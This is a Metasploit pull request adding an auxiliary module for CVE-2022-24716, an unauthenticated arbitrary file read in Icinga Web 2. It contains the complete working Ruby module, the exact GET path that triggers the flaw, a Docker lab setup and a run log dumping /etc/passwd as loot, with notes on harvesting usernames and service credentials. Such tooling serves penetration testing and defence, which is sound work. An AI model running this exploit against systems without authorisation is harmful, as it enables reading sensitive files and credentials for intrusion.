### PR TITLE
Icinga Web 2 Arbitrary File Read (CVE-2022-24716)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
@@ -1,26 +1,34 @@
 
 ## Vulnerable Application
 
-Icingaweb versions between 2.9.0-2.9.5, 2.8.0-2.8.5 (inclusive) suffer from an
+Icingaweb versions from 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive suffer from an
 unauthenticated directory traversal vulnerability. The vulnerability is triggered
-through the icinga-php-thirdparty library, and the file to read is an absolute path.
+through the icinga-php-thirdparty library, which allows unauthenticated users 
+to retrieve arbitrary files from the targets filesystem via a GET request to
+`/lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk>` as the user
+running the Icingaweb server, which will typically be the `incinga` user.
+
+This can then be used to retrieve sensitive configuration information from the target
+such as the configuration of various services, which may reveal sensitive login or configuration information,
+the `/etc/passwd` file to get a list of valid usernames for password guessing attacks, or other sensitive files 
+which may exist as part of additional functionality available on the target server.
 
 This module was tested against Icingaweb 2.9.5 running on Docker.
 
-## Install Icingaweb on Ubuntu 22.04
+## Install Icingaweb 2.9.5 on a Ubuntu 22.04 Docker Image
 
 ```
 sudo apt-get install docker.io -y
 sudo docker run -p 8080:8080 icinga/icingaweb2:2.9.5
 ```
 
-Browse to port 8080 to confirm  the site loads. No need to configure.
+Browse to port 8080 to confirm the site loads. No need to configure.
 
 ## Verification Steps
 
 1. Install the application
 2. Start msfconsole
-3. Do: `use auxiliary/scanner/http/scanner/http/icinga_static_library_file_directory_traversal`
+3. Do: `use auxiliary/scanner/http/icinga_static_library_file_directory_traversal`
 4. Do: `set rhosts [ip]`
 5. Do: `set file [file]`
 6. Do: `run`
@@ -28,7 +36,7 @@ Browse to port 8080 to confirm  the site loads. No need to configure.
 
 ## Scenarios
 
-### Version 2.9.5 from Docker
+### Icingaweb 2.9.5 on Ubuntu 22.04 running on Docker
 
 ```
 [*] Processing icinga.rb for ERB directives.

--- a/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
@@ -6,7 +6,7 @@ unauthenticated directory traversal vulnerability. The vulnerability is triggere
 through the icinga-php-thirdparty library, which allows unauthenticated users 
 to retrieve arbitrary files from the targets filesystem via a GET request to
 `/lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk>` as the user
-running the Icingaweb server, which will typically be the `incinga` user.
+running the Icingaweb server, which will typically be the `www-data` user.
 
 This can then be used to retrieve sensitive configuration information from the target
 such as the configuration of various services, which may reveal sensitive login or configuration information,

--- a/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
@@ -1,0 +1,75 @@
+
+## Vulnerable Application
+
+Icingaweb versions between 2.9.0-2.9.5, 2.8.0-2.8.5 (inclusive) suffer from an
+unauthenticated directory traversal vulnerability. The vulnerability is triggered
+through the icinga-php-thirdparty library, and the file to read is an absolute path.
+
+This module was tested against Icingaweb 2.9.5 running on Docker.
+
+## Install Icingaweb on Ubuntu 22.04
+
+```
+sudo apt-get install docker.io -y
+sudo docker network create joomla-network
+sudo docker run -p 8080:8080 icinga/icingaweb2:2.9.5
+```
+
+Browse to port 8080 to confirm  the site loads. No need to configure.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/scanner/http/icinga_static_library_file_directory_traversal`
+4. Do: `set rhosts [ip]`
+5. Do: `set file [file]`
+6. Do: `run`
+7. You should be able to retrieve a file
+
+## Scenarios
+
+### Version 2.9.5 from Docker
+
+```
+[*] Processing icinga.rb for ERB directives.
+resource (icinga.rb)> use scanner/http/icinga_static_library_file_directory_traversal
+resource (icinga.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (icinga.rb)> set file /etc/passwd
+file => /etc/passwd
+resource (icinga.rb)> check
+[*] 127.0.0.1:8080 - The service is running, but could not be validated. 127.0.0.1:8080     - Icinga Web 2 found, unable to determine version.
+resource (icinga.rb)> run
+[+] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+
+[+] /etc/passwd saved to /root/.msf4/loot/20230421161654_default_127.0.0.1_icingafile_070863.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (icinga.rb)> loot
+
+Loot
+====
+
+host          service  type         name         content     info  path
+----          -------  ----         ----         -------     ----  ----
+127.000.0.01           icinga file  /etc/passwd  text/plain        /root/.msf4/loot/20230421161654_default_127.0.0.1_icingafile_070863.txt
+```

--- a/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
@@ -1,16 +1,15 @@
-
 ## Vulnerable Application
 
 Icingaweb versions from 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive suffer from an
 unauthenticated directory traversal vulnerability. The vulnerability is triggered
-through the icinga-php-thirdparty library, which allows unauthenticated users 
+through the icinga-php-thirdparty library, which allows unauthenticated users
 to retrieve arbitrary files from the targets filesystem via a GET request to
 `/lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk>` as the user
 running the Icingaweb server, which will typically be the `www-data` user.
 
 This can then be used to retrieve sensitive configuration information from the target
 such as the configuration of various services, which may reveal sensitive login or configuration information,
-the `/etc/passwd` file to get a list of valid usernames for password guessing attacks, or other sensitive files 
+the `/etc/passwd` file to get a list of valid usernames for password guessing attacks, or other sensitive files
 which may exist as part of additional functionality available on the target server.
 
 This module was tested against Icingaweb 2.9.5 running on Docker.
@@ -30,9 +29,11 @@ Browse to port 8080 to confirm the site loads. No need to configure.
 2. Start msfconsole
 3. Do: `use auxiliary/scanner/http/icinga_static_library_file_directory_traversal`
 4. Do: `set rhosts [ip]`
-5. Do: `set file [file]`
+5. Do: `set file [file]`. On Docker use `/etc/passwd` for testing purposes.
 6. Do: `run`
 7. You should be able to retrieve a file
+
+## Options
 
 ## Scenarios
 

--- a/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.md
@@ -11,7 +11,6 @@ This module was tested against Icingaweb 2.9.5 running on Docker.
 
 ```
 sudo apt-get install docker.io -y
-sudo docker network create joomla-network
 sudo docker run -p 8080:8080 icinga/icingaweb2:2.9.5
 ```
 

--- a/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
           through the icinga-php-thirdparty library, which allows unauthenticated users
           to retrieve arbitrary files from the targets filesystem via a GET request to
           /lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk> as the user
-          running the Icingaweb server, which will typically be the incinga user.
+          running the Icingaweb server, which will typically be the www-data user.
 
           This can then be used to retrieve sensitive configuration information from the target
           such as the configuration of various services, which may reveal sensitive login

--- a/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Icingaweb Directory Traversal in Static Library File Requests',
+        'Description' => %q{
+          Icingaweb versions between 2.9.0-2.9.5, 2.8.0-2.8.5 (inclusive) suffer from an
+          unauthenticated directory traversal vulnerability. The vulnerability is triggered
+          through the icinga-php-thirdparty library, and the file to read is an absolute path.
+
+          This module was tested against Icingaweb 2.9.5 running on Docker.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Jacob Ebben', # EDB
+          'Thomas Chauchefoin' # initial POC and discovery
+        ],
+        'References' => [
+          ['EDB', '51329'],
+          ['URL', 'https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/'],
+          ['URL', 'https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw'],
+          ['URL', 'https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d'],
+          ['CVE', '2022-24716'],
+        ],
+        'Targets' => [
+          ['Icingaweb', {}],
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DisclosureDate' => '2022-05-09',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'The URI of the Icinga Application', '/']),
+        OptString.new('File', [true, 'File to retrieve', '/etc/icinga2/icinga2.conf']) # https://icinga.com/docs/icinga-2/latest/doc/04-configuration/#configuration-overview
+      ]
+    )
+  end
+
+  def check_host(_ip)
+    res = send_request_cgi!(
+      'uri' => normalize_uri(target_uri.path)
+    )
+    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return Exploit::CheckCode::Unknown("#{peer} - Page didn't load correctly (response code: #{res.code}), check TARGETURI/port?") unless res.code == 200
+    return Exploit::CheckCode::Unknown("#{peer} - Page doesn't have a body, check TARGETURI/port?") if res.body.nil?
+    return Exploit::CheckCode::Detected("#{peer} - Icinga Web 2 found, unable to determine version.") if res.body.include?('<meta name="application-name" content="Icinga Web 2">')
+
+    return Exploit::CheckCode::Safe("#{peer} - Web server found, but couldn't detect Icinga")
+  end
+
+  def run_host(ip)
+    vprint_status('Attempting to retrieve file')
+    res = send_request_cgi!(
+      'uri' => normalize_uri(target_uri.path, 'lib', 'icinga', 'icinga-php-thirdparty', datastore['FILE'])
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly. Most likely file doesn't exist (response code: #{res.code})") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly, no body found") if res.body.nil?
+    if !res.body.empty?
+      print_good(res.body)
+      loot_path = store_loot('icinga file', 'text/plain', ip, res.body, datastore['FILE'])
+      print_good("#{datastore['FILE']} saved to #{loot_path}")
+    else
+      vprint_error('Response has 0 size.')
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/icinga_static_library_file_directory_traversal.rb
@@ -14,9 +14,18 @@ class MetasploitModule < Msf::Auxiliary
         info,
         'Name' => 'Icingaweb Directory Traversal in Static Library File Requests',
         'Description' => %q{
-          Icingaweb versions between 2.9.0-2.9.5, 2.8.0-2.8.5 (inclusive) suffer from an
+          Icingaweb versions from 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive suffer from an
           unauthenticated directory traversal vulnerability. The vulnerability is triggered
-          through the icinga-php-thirdparty library, and the file to read is an absolute path.
+          through the icinga-php-thirdparty library, which allows unauthenticated users
+          to retrieve arbitrary files from the targets filesystem via a GET request to
+          /lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk> as the user
+          running the Icingaweb server, which will typically be the incinga user.
+
+          This can then be used to retrieve sensitive configuration information from the target
+          such as the configuration of various services, which may reveal sensitive login
+          or configuration information, the /etc/passwd file to get a list of valid usernames
+          for password guessing attacks, or other sensitive files which may exist as part of
+          additional functionality available on the target server.
 
           This module was tested against Icingaweb 2.9.5 running on Docker.
         },
@@ -38,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [],
+          'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS]
         },
         'DisclosureDate' => '2022-05-09',
@@ -49,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [true, 'The URI of the Icinga Application', '/']),
-        OptString.new('File', [true, 'File to retrieve', '/etc/icinga2/icinga2.conf']) # https://icinga.com/docs/icinga-2/latest/doc/04-configuration/#configuration-overview
+        OptString.new('FILE', [true, 'File to retrieve', '/etc/icinga2/icinga2.conf']) # https://icinga.com/docs/icinga-2/latest/doc/04-configuration/#configuration-overview
       ]
     )
   end
@@ -80,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
       loot_path = store_loot('icinga file', 'text/plain', ip, res.body, datastore['FILE'])
       print_good("#{datastore['FILE']} saved to #{loot_path}")
     else
-      vprint_error('Response has 0 size.')
+      print_error('Response has 0 size.')
     end
   end
 end


### PR DESCRIPTION
This PR adds a module to exploit CVE-2022-24716, an unauthenticated absolute path remote file read in Icinga Web 2.

## Verification
- [x] Install the application
- [x] Start `msfconsole`
- [x] Do: `use auxiliary/scanner/http/icinga_static_library_file_directory_traversal`
- [x] Do: `set rhosts [ip]`
- [x] Do: `set file [file]`
- [x] Do: `run`
- [x] You should be able to retrieve a file